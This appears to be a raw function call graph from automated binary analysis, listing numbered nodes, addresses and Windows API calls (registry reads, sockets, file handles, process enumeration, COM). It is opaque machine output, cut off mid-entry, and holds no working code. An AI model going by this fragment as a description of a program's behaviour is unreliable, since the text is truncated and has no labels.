104033->104035 104043 af315d Mailbox 104033->104043 104037 af31f7 104034->104037 104038 af31c5 104034->104038 104035->104034 104035->104043 104039 a984a6 81 API calls 104037->104039 104041 af31d9 RegCloseKey 104038->104041 104038->104043 104040 af3207 RegQueryValueExW 104039->104040 104042 af323e 104040->104042 104071 af3229 104040->104071 104041->104043 104044 af344c 104042->104044 104045 af3265 104042->104045 104042->104071 104043->103815 104046 ab010a 48 API calls 104044->104046 104048 af326e 104045->104048 104049 af33d9 104045->104049 104050 af3464 104046->104050 104047 af34eb RegCloseKey 104047->104043 104051 af34fe RegCloseKey 104047->104051 104053 af338d 104048->104053 104054 af3279 104048->104054 105494 adad14 48 API calls _memset 104049->105494 104056 a984a6 81 API calls 104050->104056 104051->104043 104055 a984a6 81 API calls 104053->104055 104058 af32de 104054->104058 104059 af327e 104054->104059 104060 af33a1 RegQueryValueExW 104055->104060 104062 af3479 RegQueryValueExW 104056->104062 104057 af33e4 104063 a984a6 81 API calls 104057->104063 104061 ab010a 48 API calls 104058->104061 104064 a984a6 81 API calls 104059->104064 104059->104071 104060->104071 104065 af32f7 104061->104065 104062->104071 104072 af3331 104062->104072 104066 af33f6 RegQueryValueExW 104063->104066 104067 af329f RegQueryValueExW 104064->104067 104068 a984a6 81 API calls 104065->104068 104066->104047 104066->104071 104067->104071 104069 af330c RegQueryValueExW 104068->104069 104069->104071 104069->104072 104070 a9ca8e 48 API calls 104070->104071 104071->104047 104072->104070 104074 a984a6 81 API calls 104073->104074 104075 ae913f 104074->104075 104076 a9cdb4 48 API calls 104075->104076 104077 ae9149 104076->104077 105495 aeacd3 104077->105495 104079 ae9156 104080 ae915a socket 104079->104080 104084 ae9182 104079->104084 104081 ae916d WSAGetLastError 104080->104081 104082 ae9184 connect 104080->104082 104081->104084 104083 ae91a3 WSAGetLastError 104082->104083 104082->104084 105501 add7e4 104083->105501 104084->103815 104086 ae91b8 closesocket 104086->104084 104088 a984a6 81 API calls 104087->104088 104089 a981e5 104088->104089 104090 a984a6 81 API calls 104089->104090 104091 a981fa 104090->104091 104092 a984a6 81 API calls 104091->104092 104093 a9820d 104092->104093 104094 a984a6 81 API calls 104093->104094 104095 a98223 104094->104095 104096 a97b6e 48 API calls 104095->104096 104097 a98237 104096->104097 104098 a9cdb4 48 API calls 104097->104098 104153 a9846a 104097->104153 104099 a9825e 104098->104099 104100 b0d752 104099->104100 104127 a98281 __wopenfile 104099->104127 104099->104153 104103 a93320 48 API calls 104100->104103 104101 b0d91e 104105 a93320 48 API calls 104101->104105 104102 b0d95f 104104 a93320 48 API calls 104102->104104 104106 b0d769 104103->104106 104107 b0d96a 104104->104107 104108 b0d928 104105->104108 104135 b0d790 104106->104135 105533 aa2320 50 API calls 104106->105533 105540 aa2320 50 API calls 104107->105540 104110 a984a6 81 API calls 104108->104110 104114 b0d93a 104110->104114 104112 a984a6 81 API calls 104115 a98306 104112->104115 104113 b0d985 104122 a984a6 81 API calls 104113->104122 105539 a980ea 48 API calls _memmove 104114->105539 104119 a984a6 81 API calls 104115->104119 104118 b0d94e 104120 a98182 48 API calls 104118->104120 104121 a9831b 104119->104121 104125 b0d95c 104120->104125 104123 b0d7ed 104121->104123 104128 a98342 104121->104128 104121->104153 104126 b0d9a0 104122->104126 104123->104153 105516 a93320 104123->105516 104124 a98182 48 API calls 104124->104135 105542 aa2320 50 API calls 104125->105542 105541 a980ea 48 API calls _memmove 104126->105541 104127->104112 104127->104123 104145 a98364 104127->104145 104127->104153 104132 a93320 48 API calls 104128->104132 104138 a9834c 104132->104138 104133 b0d9b4 104139 a98182 48 API calls 104133->104139 104135->104124 104137 a9843f Mailbox 104135->104137 105534 a980ea 48 API calls _memmove 104135->105534 105535 aa2320 50 API calls 104135->105535 104136 b0d84a 105536 aa2320 50 API calls 104136->105536 104137->103815 104142 a9c4cd 48 API calls 104138->104142 104139->104125 104142->104145 104145->104137 104146 b0d895 104145->104146 105527 ab247b 59 API calls 3 library calls 104145->105527 105528 a980ea 48 API calls _memmove 104145->105528 105529 a98182 104145->105529 105532 aa2320 50 API calls 104145->105532 104147 b0d8ce 104146->104147 104148 b0d8bf 104146->104148 104149 a98182 48 API calls 104147->104149 105537 a9bd2f 48 API calls _memmove 104148->105537 104150 b0d8dc 104149->104150 105538 aa2320 50 API calls 104150->105538 104153->104101 104153->104102 104154 b0d8ee 104156 a9c4cd 48 API calls 104154->104156 104156->104153 104158 a9ca8e 48 API calls 104157->104158 104159 aaef25 104158->104159 104160 aaeffb 104159->104160 104161 aaef3e 104159->104161 104162 ab010a 48 API calls 104160->104162 105573 aaf0f3 48 API calls 104161->105573 104164 aaf002 104162->104164 104168 aaf00e 104164->104168 105575 a95080 49 API calls 104164->105575 104165 aaef4d 104166 b06942 104165->104166 104170 aaef73 104165->104170 104171 a9cdb4 48 API calls 104165->104171 104166->103815 104169 a984a6 81 API calls 104168->104169 104172 aaf01c 104169->104172 104173 aaf03e 2 API calls 104170->104173 104174 b06965 104171->104174 104175 a94bf9 56 API calls 104172->104175 104176 aaef7a 104173->104176 104174->104170 104177 b0696d 104174->104177 104178 aaf02b 104175->104178 104179 b06980 104176->104179 104180 aaef87 104176->104180 104181 a9cdb4 48 API calls 104177->104181 104178->104165 104182 b06936 104178->104182 104183 ab010a 48 API calls 104179->104183 104184 a9d3d2 48 API calls 104180->104184 104181->104176 104182->104166 105576 a94592 CloseHandle 104182->105576 104185 b06986 104183->104185 104186 aaef8f 104184->104186 104187 b0699f 104185->104187 105577 a93d65 ReadFile SetFilePointerEx 104185->105577 105544 aaf04e 104186->105544 104194 b069a3 _memmove 104187->104194 105578 adad14 48 API calls _memset 104187->105578 104190 aaef9e 104190->104194 105567 a97bef 104190->105567 104195 aaefb2 Mailbox 104196 aaeff2 104195->104196 104197 a950ec CloseHandle 104195->104197 104196->103815 104198 aaefe4 104197->104198 105574 a94592 CloseHandle 104198->105574 104201 a9a6d4 48 API calls 104200->104201 104202 ae92d2 104201->104202 104203 a984a6 81 API calls 104202->104203 104204 ae92e1 104203->104204 104205 aaf26b 50 API calls 104204->104205 104206 ae92ed gethostbyname 104205->104206 104207 ae931d _memmove 104206->104207 104208 ae92fa WSAGetLastError 104206->104208 104210 ae932d inet_ntoa 104207->104210 104209 ae930e 104208->104209 104211 a9ca8e 48 API calls 104209->104211 105621 aeadca 48 API calls 2 library calls 104210->105621 104213 ae931b Mailbox 104211->104213 104213->103815 104214 ae9342 105622 aeae5a 50 API calls 104214->105622 104216 ae934e 104217 a97bef 48 API calls 104216->104217 104217->104213 105623 aadd92 GetFileAttributesW 104218->105623 104222 aaf0b5 2 API calls 104221->104222 104223 aaf046 104222->104223 104223->103815 104225 a984a6 81 API calls 104224->104225 104226 af17c7 104225->104226 104227 ad6f5b 63 API calls 104226->104227 104228 af17d8 104227->104228 104228->103815 104230 ae015e 104229->104230 104231 ae0157 104229->104231 104232 a984a6 81 API calls 104230->104232 104233 a984a6 81 API calls 104231->104233 104232->104231 104234 ae017c 104233->104234 105628 ad76db GetFileVersionInfoSizeW 104234->105628 104236 ae018d 104237 ae0192 104236->104237 104239 ae01a3 _wcscmp 104236->104239 104238 a9ca8e 48 API calls 104237->104238 104241 ae01a1 104238->104241 104240 a9ca8e 48 API calls 104239->104240 104240->104241 104241->103815 105644 af23c5 104242->105644 104246 a984a6 81 API calls 104245->104246 104247 af10fb LoadLibraryW 104246->104247 104248 af111e 104247->104248 104249 af110f 104247->104249 104248->104249 105728 af28d9 48 API calls _memmove 104248->105728 104249->103815 105729 aef79f 104251->105729 104253 af0c0a 104253->103815 104255 ab010a 48 API calls 104254->104255 104256 a950b3 104255->104256 104257 a950ec CloseHandle 104256->104257 104258 a950be 104257->104258 104258->103815 105804 ae6b19 104259->105804 104262 ae80a5 104263 a93320 48 API calls 104262->104263 104264 ae80b3 104263->104264 105809 aa2320 50 API calls 104264->105809 104265 ae8102 104267 a9cdb4 48 API calls 104265->104267 104272 ae80f5 104265->104272 104269 ae812b 104267->104269 104268 ae80cf 105810 aa2320 50 API calls 104268->105810 104271 a9cdb4 48 API calls 104269->104271 104269->104272 104271->104272 104272->103815 104274 a919ee 83 API calls 104273->104274 104275 af8062 104274->104275 104276 a91dce 107 API calls 104275->104276 104277 af806b 104276->104277 104278 af806f 104277->104278 104279 af8091 104277->104279 104282 a9ca8e 48 API calls 104278->104282 104280 a9d3d2 48 API calls 104279->104280 104281 af809a 104280->104281 105811 ace2e8 104281->105811 104286 af808f Mailbox 104282->104286 104284 af80aa 104285 a97bef 48 API calls 104284->104285 104285->104286 104286->103815 104288 aaf47f 104287->104288 104289 aaf48a 104287->104289 104290 a9cdb4 48 API calls 104288->104290 104293 a984a6 81 API calls 104289->104293 104314 aaf498 Mailbox 104289->104314 104290->104289 104291 ab010a 48 API calls 104292 aaf49f 104291->104292 104294 aaf4af 104292->104294 105836 a95080 49 API calls 104292->105836 104295 b06841 104293->104295 104299 a984a6 81 API calls 104294->104299 104296 ab297d __wsplitpath 47 API calls 104295->104296 104298 b06859 104296->104298 104300 a9caee 48 API calls 104298->104300 104301 aaf4bf 104299->104301 104302 b0686a 104300->104302 104303 a94bf9 56 API calls 104301->104303 105837 a939e8 48 API calls 2 library calls 104302->105837 104305 aaf4ce 104303->104305 104306 b068d4 GetLastError 104305->104306 104318 aaf4d6 104305->104318 104309 b068ed 104306->104309 104307 b06878 104308 b06895 104307->104308 105838 ad6f4b GetFileAttributesW FindFirstFileW FindClose 104307->105838 104310 a9cdb4 48 API calls 104308->104310 104309->104318 105839 a94592 CloseHandle 104309->105839 104310->104314 104311 b06920 104316 ab010a 48 API calls 104311->104316 104312 aaf4f0 104315 ab010a 48 API calls 104312->104315 104314->104291 104324 aaf50a Mailbox 104314->104324 104319 aaf4f5 104315->104319 104320 b06925 104316->104320 104317 b06888 104317->104308 104323 ad6d6d 52 API calls 104317->104323 104318->104311 104318->104312 104322 a9197e 48 API calls 104319->104322 104322->104324 104323->104308 104324->103815 104326 a9ca8e 48 API calls 104325->104326 104327 aeb7a3 CoInitialize 104326->104327 104328 aeb7ae CoUninitialize 104327->104328 104329 aeb7b4 104327->104329 104328->104329 104330 aeb7d5 104329->104330 104332 a9ca8e 48 API calls 104329->104332 104331 aeb81b 104330->104331 104333 a984a6 81 API calls 104330->104333 104334 a984a6 81 API calls 104331->104334 104332->104330 104335 aeb7ef 104333->104335 104336 aeb827 104334->104336 105840 aca857 CLSIDFromProgID ProgIDFromCLSID lstrcmpiW CoTaskMemFree CLSIDFromString 104335->105840 104340 aeb9d3 SetErrorMode CoGetInstanceFromFile 104336->104340 104349 aeb861 104336->104349 104338 aeb802 104338->104331 104339 aeb807 104338->104339 105841 aec235 413 API calls Mailbox 104339->105841 104341 aeba1f CoGetObject 104340->104341 104342 aeba19 SetErrorMode 104340->104342 104341->104342 104346 aebaa8 104341->104346 104351 aeb9b1 104342->104351 104344 aeb8a8 GetRunningObjectTable 104347 aeb8b8 104344->104347 104348 aeb8cb 104344->104348 105846 aec235 413 API calls Mailbox 104346->105846 104347->104348 104365 aeb8ed 104347->104365 105842 aec235 413 API calls Mailbox 104348->105842 104349->104344 104357 a9cdb4 48 API calls 104349->104357 104363 aeb89a 104349->104363 104351->104346 104356 aeba53 104351->104356 104352 aebad0 VariantClear 104352->103815 104354 aeb814 Mailbox 104354->104352 104355 aebac2 SetErrorMode 104355->104354 104361 aeba6f 104356->104361 105844 acac4b 51 API calls Mailbox 104356->105844 104360 aeb88a 104357->104360 104362 a9cdb4 48 API calls 104360->104362 104360->104363 105845 ada6f6 103 API calls 104361->105845 104362->104363 104363->104344 104365->104351 105843 acac4b 51 API calls Mailbox 104365->105843 104366->103815 104368 a9cafd __wsetenvp _memmove 104367->104368 104369 ab010a 48 API calls 104368->104369 104370 a9cb3b 104369->104370 104370->103814 104371->103815 104372->103815 104373->103815 104374->103815 104375->103814 104376->103808 104377->103782 104378->103786 104379->103796 104380->103802 104516 a9d3d2 104381->104516 104383 aef389 Mailbox 104384 aef3a9 104383->104384 104386 aef3cd 104383->104386 104387 aef3e1 104383->104387 104385 a9d89e 50 API calls 104384->104385 104401 aef421 Mailbox 104385->104401 104527 a97e53 104386->104527 104389 a9c935 48 API calls 104387->104389 104390 aef3df 104389->104390 104391 aef429 104390->104391 104536 aecdb5 413 API calls 104390->104536 104521 aecd12 104391->104521 104394 aef410 104394->104391 104396 aef414 104394->104396 104395 aef44b 104398 aef457 104395->104398 104399 aef4a2 104395->104399 104537 add338 86 API calls 4 library calls 104396->104537 104398->104384 104402 aef476 104398->104402 104400 aef34f 413 API calls 104399->104400 104400->104401 104401->104009 104403 a9ca8e 48 API calls 104402->104403 104403->104401 104404->103957 104406 a93444 104405->104406 104407 a93435 104405->104407 104406->103989 104408 ab010a 48 API calls 104407->104408 104408->104406 104409->103989 104410->104011 104411->103989 104412->103958 104413->104011 104414->104011 104415->103971 104416->104005 104418 aa469f 104417->104418 104419 aa4537 104417->104419 104422 a9caee 48 API calls 104418->104422 104420 b07820 104419->104420 104421 aa4543 104419->104421 104786 aee713 413 API calls Mailbox 104420->104786 104614 aa4040 104421->104614 104429 aa45e4 Mailbox 104422->104429 104425 b0782c 104426 aa4639 Mailbox 104425->104426 104787 add520 86 API calls 4 library calls 104425->104787 104426->104009 104428 aa4559 104428->104425 104428->104426 104428->104429 104436 af1f19 132 API calls 104429->104436 104629 ae9500 104429->104629 104638 ae1080 104429->104638 104641 ae95af WSAStartup 104429->104641 104643 ae6fc3 104429->104643 104646 aaf55e 104429->104646 104655 a950ec 104429->104655 104659 af352a 104429->104659 104747 addce9 104429->104747 104752 adefcd 104429->104752 104436->104426 104440->104000 104441->104007 104442->104012 105336 a9a9a0 104443->105336 104445 aa36e7 104446 aa3778 104445->104446 104447 b0a269 104445->104447 104509 aa3aa8 104445->104509 105348 aabc04 86 API calls 104446->105348 105353 add520 86 API calls 4 library calls 104447->105353 104448 aa3ab5 Mailbox 104448->104009 104452 b0a68d 104452->104509 105368 add520 86 API calls 4 library calls 104452->105368 104454 aa3793 104454->104452 104474 aa396b Mailbox _memmove 104454->104474 104454->104509 105341 a910e8 104454->105341 104455 aabc5c 48 API calls 104455->104474 104459 b0a45c 105362 add520 86 API calls 4 library calls 104459->105362 104460 b0a583 104464 a9fa40 413 API calls 104460->104464 104461 b0a289 104462 a9d2d2 53 API calls 104461->104462 104502 b0a3e9 104461->104502 104465 b0a2fb 104462->104465 104466 b0a5b5 104464->104466 104467 b0a303 104465->104467 104468 b0a40f 104465->104468 104478 a9d380 55 API calls 104466->104478 104466->104509 104482 b0a317 104467->104482 104493 b0a341 104467->104493 105359 aacf79 49 API calls 104468->105359 104470 aa384e 104470->104474 104475 b0a60c 104470->104475 104476 aa38e5 104470->104476 104474->104455 104474->104459 104474->104460 104474->104461 104479 a9fa40 413 API calls 104474->104479 104484 b0a5e6 104474->104484 104494 aa399f 104474->104494 104496 a9d89e 50 API calls 104474->104496 104506 ab010a 48 API calls 104474->104506 104474->104509 105349 a9d500 53 API calls __cinit 104474->105349 105350 a9d420 53 API calls 104474->105350 105351 aabaef 48 API calls _memmove 104474->105351 105363 aed21a 82 API calls Mailbox 104474->105363 105364 ad89e0 53 API calls 104474->105364 105365 a9d772 55 API calls 104474->105365 105367 add231 50 API calls 104475->105367 104483 ab010a 48 API calls 104476->104483 104478->104484 104479->104474 104481 b0a42c 104485 b0a441 104481->104485 104486 b0a44d 104481->104486 105354 add520 86 API calls 4 library calls 104482->105354 105366 add520 86 API calls 4 library calls 104484->105366 104492 b0a384 104498 b0a37a 104492->104498 105356 aef4df 413 API calls 104492->105356 104493->104492 104495 b0a366 104493->104495 104503 a9c935 48 API calls 104494->104503 104504 aa39c0 104494->104504 105355 aef211 413 API calls 104495->105355 104496->104474 104498->104509 105358 add520 86 API calls 4 library calls 104502->105358 104503->104504 104507 b0a65e 104504->104507 104504->104509 104511 aa3a05 104504->104511 104506->104474 104508 a9d89e 50 API calls 104507->104508 104508->104452 104509->104448 105352 add520 86 API calls 4 library calls 104509->105352 104510 aa3a95 104512 a9d89e 50 API calls 104510->104512 104511->104452 104511->104509 104511->104510 104512->104509 104513->104009 104514->103979 104515->103987 104517 ab010a 48 API calls 104516->104517 104518 a9d3f3 104517->104518 104519 ab010a 48 API calls 104518->104519 104520 a9d401 104519->104520 104520->104383 104522 aecd46 104521->104522 104523 aecd21 104521->104523 104522->104395 104524 a9ca8e 48 API calls 104523->104524 104525 aecd2d 104524->104525 104538 aec8b7 104525->104538 104528 a97ecf 104527->104528 104529 a97e5f __wsetenvp 104527->104529 104606 a9a2fb 104528->104606 104531 a97e7b 104529->104531 104532 a97ec7 104529->104532 104602 a9a6f8 104531->104602 104605 a97eda 48 API calls 104532->104605 104535 a97e85 _memmove 104535->104390 104536->104394 104537->104401 104540 aec914 104538->104540 104541 aec8f7 104538->104541 104596 aec235 413 API calls Mailbox 104540->104596 104541->104540 104542 aecc61 104541->104542 104543 aec934 104541->104543 104544 aecc6e 104542->104544 104545 aecca9 104542->104545 104543->104540 104574 acabf3 104543->104574 104592 aad6b4 48 API calls 104544->104592 104545->104540 104548 aeccb6 104545->104548 104547 aec964 104547->104540 104549 aec973 104547->104549 104594 aad6b4 48 API calls 104548->104594 104561 aec9a1 104549->104561 104578 aca8c8 104549->104578 104551 aecc87 104593 ad97b6 89 API calls 104551->104593 104555 aeccd6 104595 ad503c 91 API calls Mailbox 104555->104595 104557 aecadc VariantInit 104564 aecb11 _memset 104557->104564 104560 aeca4a 104560->104557 104562 aeca86 VariantClear 104560->104562 104561->104560 104588 aca25b 106 API calls 104561->104588 104562->104560 104563 aecaa5 SysAllocString 104562->104563 104563->104560 104571 aecc52 104571->104522 104575 acac04 __wsetenvp 104574->104575 104577 acac16 104574->104577 104575->104577 104597 a93bcf 104575->104597 104577->104547 104580 aca8f2 104578->104580 104579 aca9ed SysFreeString 104587 aca9f9 104579->104587 104580->104579 104581 aca90a 104580->104581 104582 acaa7e 104580->104582 104580->104587 104581->104561 104582->104581 104583 acaad9 SysFreeString 104582->104583 104584 acaac9 lstrcmpiW 104582->104584 104582->104587 104583->104582 104584->104583 104587->104581 104601 aca78a RaiseException 104587->104601 104588->104561 104592->104551 104593->104571 104594->104555 104595->104571 104596->104571 104598 a93bd9 __wsetenvp 104597->104598 104599 ab010a 48 API calls 104598->104599 104600 a93bee _wcscpy 104599->104600 104600->104577 104601->104587 104603 ab010a 48 API calls 104602->104603 104604 a9a702 104603->104604 104604->104535 104605->104535 104607 a9a309 104606->104607 104609 a9a321 _memmove 104606->104609 104607->104609 104610 a9b8a7 104607->104610 104609->104535 104611 a9b8ba 104610->104611 104612 a9b8b7 _memmove 104610->104612 104613 ab010a 48 API calls 104611->104613 104612->104609 104613->104612 104615 b0787b 104614->104615 104618 aa406c 104614->104618 104789 add520 86 API calls 4 library calls 104615->104789 104617 b0788c 104790 add520 86 API calls 4 library calls 104617->104790 104618->104617 104626 aa40a6 _memmove 104618->104626 104620 aa4175 104625 aa4185 104620->104625 104788 aed21a 82 API calls Mailbox 104620->104788 104622 aa41f1 104622->104428 104623 ab010a 48 API calls 104623->104626 104624 a9fa40 413 API calls 104624->104626 104625->104428 104626->104620 104626->104623 104626->104624 104626->104625 104627 b078d8 104626->104627 104791 add520 86 API calls 4 library calls 104627->104791 104630 a9cdb4 48 API calls 104629->104630 104631 ae9515 104630->104631 104792 adbe47 104631->104792 104633 ae9522 104634 ae952f send 104633->104634 104635 ae9546 104634->104635 104636 ae9552 WSAGetLastError 104635->104636 104637 ae956a 104635->104637 104636->104637 104637->104426 104797 ae22e5 104638->104797 104640 ae1090 104640->104426 104642 ae95e0 104641->104642 104642->104426 104644 a984a6 81 API calls 104643->104644 104645 ae6fd6 SetWindowTextW 104644->104645 104645->104426 104647 a9cdb4 48 API calls 104646->104647 104648 aaf572 104647->104648 104649 aaf57a timeGetTime 104648->104649 104650 b075d1 Sleep 104648->104650 104651 a9cdb4 48 API calls 104649->104651 104652 aaf590 104651->104652 104983 a9e1f0 104652->104983 104656 a95105 104655->104656 104657 a950f6 104655->104657 104656->104657 104658 a9510a CloseHandle 104656->104658 104657->104426 104658->104657 104660 a9d3d2 48 API calls 104659->104660 104661 af354a 104660->104661 104662 a9d3d2 48 API calls 104661->104662 104663 af3553 104662->104663 104664 a9d3d2 48 API calls 104663->104664 104665 af355c 104664->104665 104666 a984a6 81 API calls 104665->104666 104675 af35e9 Mailbox 104665->104675 104667 af3580 104666->104667 105243 af3d7b 104667->105243 104675->104426 104748 a984a6 81 API calls 104747->104748 104749 addcfc 104748->104749 105308 ad6d6d 104749->105308 104751 addd06 104751->104426 104753 a984a6 81 API calls 104752->104753 104754 adeff2 104753->104754 105320 ad78ad GetFullPathNameW 104754->105320 104759 adf04b CoInitialize CoCreateInstance 104761 adf08e 104759->104761 104762 adf070 104759->104762 104763 a984a6 81 API calls 104761->104763 104764 adf07a CoUninitialize 104762->104764 104765 adf09d 104763->104765 104766 adf23c Mailbox 104764->104766 104766->104426 104786->104425 104787->104426 104788->104622 104789->104617 104790->104625 104791->104625 104793 adbe55 104792->104793 104794 adbe50 104792->104794 104793->104633 104796 adae06 50 API calls 2 library calls 104794->104796 104796->104793 104798 ae2306 104797->104798 104799 ae230a 104798->104799 104800 ae2365 104798->104800 104801 ab010a 48 API calls 104799->104801 104866 aaf0f3 48 API calls 104800->104866 104803 ae2311 104801->104803 104804 ae231f 104803->104804 104853 a95080 49 API calls 104803->104853 104806 a984a6 81 API calls 104804->104806 104808 ae2331 104806->104808 104807 ae2379 104809 ae234d 104807->104809 104811 ae243f 104807->104811 104814 ae23bb 104807->104814 104854 a94bf9 104808->104854 104809->104640 104812 adbe47 50 API calls 104811->104812 104817 ae2446 104812->104817 104816 a984a6 81 API calls 104814->104816 104825 ae23c2 104816->104825 104873 ad689f SetFilePointerEx SetFilePointerEx WriteFile 104817->104873 104819 ae23f6 104835 ad67dc 104819->104835 104822 ae2400 104867 a97b6e 104822->104867 104825->104819 104825->104822 104829 ae23fe Mailbox 104829->104809 104831 a950ec CloseHandle 104829->104831 104832 ae2490 104831->104832 104874 a94592 CloseHandle 104832->104874 104836 ad67ec 104835->104836 104837 ad67f6 104835->104837 104891 ad6917 SetFilePointerEx SetFilePointerEx WriteFile 104836->104891 104838 ad67fc 104837->104838 104839 ad6808 104837->104839 104892 ad68b9 51 API calls 104838->104892 104843 ad6824 104839->104843 104844 ad6811 104839->104844 104841 ad67f4 Mailbox 104841->104829 104875 a9a6d4 104843->104875 104845 a9a6d4 48 API calls 104844->104845 104853->104804 104855 a950ec CloseHandle 104854->104855 104856 a94c04 104855->104856 104929 a94b88 104856->104929 104866->104807 104868 ab010a 48 API calls 104867->104868 104869 a97b93 104868->104869 104870 a9a6f8 48 API calls 104869->104870 104871 a97ba2 104870->104871 104873->104829 104874->104809 104891->104841 104892->104841 104930 b04957 104929->104930 104931 a94ba1 CreateFileW 104929->104931 104932 a94bc3 104930->104932 104933 b0495d CreateFileW 104930->104933 104931->104932 104933->104932 104984 a9e216 104983->104984 105007 a9e226 Mailbox 104983->105007 104985 a9e670 104984->104985 104984->105007 105113 aaecee 413 API calls 104985->105113 104986 add520 86 API calls 104986->105007 104987 a9e4e7 104989 a9e4fd 104987->104989 105114 a9322e 16 API calls 104987->105114 104989->104426 104991 a9e681 104991->104989 104992 a9e68e 104991->104992 105115 aaec33 413 API calls Mailbox 104992->105115 104993 a9e26c PeekMessageW 104993->105007 104995 a9e695 LockWindowUpdate DestroyWindow GetMessageW 104995->104989 104998 a9e6c7 104995->104998 104996 b05b13 Sleep 104996->105007 105002 a9e657 PeekMessageW 105002->105007 105003 a9e517 timeGetTime 105003->105007 105005 ab010a 48 API calls 105005->105007 105006 a9c935 48 API calls 105006->105007 105007->104986 105007->104987 105007->104993 105007->104996 105007->105002 105007->105003 105007->105005 105007->105006 105008 a9e641 TranslateMessage DispatchMessageW 105007->105008 105009 b05dfc WaitForSingleObject 105007->105009 105010 b06147 Sleep 105007->105010 105013 b05cce Mailbox 105007->105013 105014 a9e6cc timeGetTime 105007->105014 105015 b05feb Sleep 105007->105015 105022 a91000 389 API calls 105007->105022 105026 b05cea Sleep 105007->105026 105029 a91dce 107 API calls 105007->105029 105032 aacf79 49 API calls 105007->105032 105038 a9fa40 389 API calls 105007->105038 105040 aa44e0 389 API calls 105007->105040 105041 aa3680 389 API calls 105007->105041 105043 a9caee 48 API calls 105007->105043 105044 a9d380 55 API calls 105007->105044 105045 a9e7e0 105007->105045 105052 a9ea00 105007->105052 105102 aaf381 105007->105102 105107 aaed1a 105007->105107 105112 a9e7b0 413 API calls Mailbox 105007->105112 105117 af8b20 48 API calls 105007->105117 105121 aae3a5 timeGetTime 105007->105121 105008->105002 105009->105007 105011 b05e19 GetExitCodeProcess CloseHandle 105009->105011 105010->105013 105011->105007 105012 a9d3d2 48 API calls 105012->105013 105013->105007 105013->105012 105020 b061de GetExitCodeProcess 105013->105020 105013->105026 105027 b05cd7 Sleep 105013->105027 105028 af8a48 108 API calls 105013->105028 105031 b06266 Sleep 105013->105031 105033 a9caee 48 API calls 105013->105033 105037 a9d380 55 API calls 105013->105037 105118 ad56dc 49 API calls Mailbox 105013->105118 105119 aacf79 49 API calls 105013->105119 105120 a91000 413 API calls 105013->105120 105122 aed12a 50 API calls 105013->105122 105123 ad8355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 105013->105123 105124 aae3a5 timeGetTime 105013->105124 105125 ad6f5b CreateToolhelp32Snapshot Process32FirstW 105013->105125 105116 aacf79 49 API calls 105014->105116 105015->105007 105024 b061f4 WaitForSingleObject 105020->105024 105025 b0620a CloseHandle 105020->105025 105022->105007 105024->105007 105024->105025 105025->105013 105026->105007 105027->105026 105028->105013 105029->105007 105031->105007 105032->105007 105033->105013 105037->105013 105038->105007 105040->105007 105041->105007 105043->105007 105044->105007 105046 a9e7fd 105045->105046 105047 a9e80f 105045->105047 105132 a9dcd0 105046->105132 105163 add520 86 API calls 4 library calls 105047->105163 105049 a9e806 105049->105007 105051 b098e8 105051->105051 105053 a9ea20 105052->105053 105054 a9fa40 413 API calls 105053->105054 105057 a9ea89 105053->105057 105056 b09919 105054->105056 105055 b099bc 105178 add520 86 API calls 4 library calls 105055->105178 105056->105057 105175 add520 86 API calls 4 library calls 105056->105175 105062 a9d3d2 48 API calls 105057->105062 105071 a9ecd7 Mailbox 105057->105071 105076 a9eb18 105057->105076 105060 a9d3d2 48 API calls 105061 b09997 105060->105061 105177 ab1b2a 52 API calls __cinit 105061->105177 105064 b09963 105062->105064 105176 ab1b2a 52 API calls __cinit 105064->105176 105065 add520 86 API calls 105065->105071 105066 a9d380 55 API calls 105066->105071 105068 b09d70 105187 aee2fb 413 API calls Mailbox 105068->105187 105070 b09e49 105192 add520 86 API calls 4 library calls 105070->105192 105071->105055 105071->105065 105071->105066 105071->105068 105071->105070 105072 b09dc2 105071->105072 105073 b09ddf 105071->105073 105075 a9fa40 413 API calls 105071->105075 105079 a9342c 48 API calls 105071->105079 105081 aa14a0 48 API calls 105071->105081 105084 a9ef0c Mailbox 105071->105084 105085 a9f56f 105071->105085 105090 b09a3c 105071->105090 105171 a9d805 105071->105171 105179 ada3ee 48 API calls 105071->105179 105180 aeede9 413 API calls 105071->105180 105185 aca599 InterlockedDecrement 105071->105185 105186 aef4df 413 API calls 105071->105186 105189 add520 86 API calls 4 library calls 105072->105189 105190 aec235 413 API calls Mailbox 105073->105190 105075->105071 105076->105060 105076->105071 105079->105071 105081->105071 105084->105007 105085->105084 105188 add520 86 API calls 4 library calls 105085->105188 105086 b09df7 105086->105084 105181 aed154 48 API calls 105090->105181 105092 b09a48 105103 b0ee11 105102->105103 105104 aaf390 105102->105104 105105 b0ee46 105103->105105 105106 b0ee28 TranslateAcceleratorW 105103->105106 105104->105007 105106->105104 105108 aaed2c 105107->105108 105109 aaed34 105107->105109 105108->105007 105109->105108 105110 aaed5e IsDialogMessageW 105109->105110 105111 b0ebec GetClassLongW 105109->105111 105110->105108 105110->105109 105111->105109 105111->105110 105112->105007 105113->104987 105114->104991 105115->104995 105116->105007 105117->105007 105118->105013 105119->105013 105120->105013 105121->105007 105122->105013 105123->105013 105124->105013 105193 ad79c2 105125->105193 105127 ad6fa4 Process32NextW 105128 ad7021 CloseHandle 105127->105128 105129 ad6fa0 _wcscat 105127->105129 105128->105013 105129->105127 105129->105128 105199 ab297d 105129->105199 105202 ab1bc7 105129->105202 105133 a9fa40 413 API calls 105132->105133 105146 a9dd0f _memmove 105133->105146 105134 b08dbe 105170 add520 86 API calls 4 library calls 105134->105170 105137 a9dd70 105137->105049 105138 a9e12b Mailbox 105140 ab010a 48 API calls 105138->105140 105139 a9e051 105145 ab010a 48 API calls 105145->105146 105146->105134 105146->105137 105146->105138 105146->105145 105148 a9deb7 105146->105148 105158 a9df29 105146->105158 105148->105138 105150 a9dec4 105148->105150 105151 a9df64 105151->105049 105152 b08d9e 105158->105139 105158->105151 105158->105152 105159 b08d76 105158->105159 105161 b08d51 105158->105161 105165 a95322 413 API calls 105158->105165 105163->105051 105165->105158 105173 a9d815 105171->105173 105174 a9d828 _memmove 105171->105174 105172 ab010a 48 API calls 105172->105174 105173->105172 105173->105174 105174->105071 105175->105057 105176->105076 105177->105071 105178->105084 105179->105071 105180->105071 105181->105092 105185->105071 105186->105071 105187->105085 105188->105084 105189->105084 105190->105086 105192->105084 105194 ad79e9 105193->105194 105198 ad79d0 105193->105198 105213 ab224a 58 API calls __wcstoi64 105194->105213 105197 ad79ef 105197->105129 105198->105194 105198->105197 105212 ab22df GetStringTypeW __wtof_l 105198->105212 105212->105198 105213->105197 105277 a9c4cd 105243->105277 105245 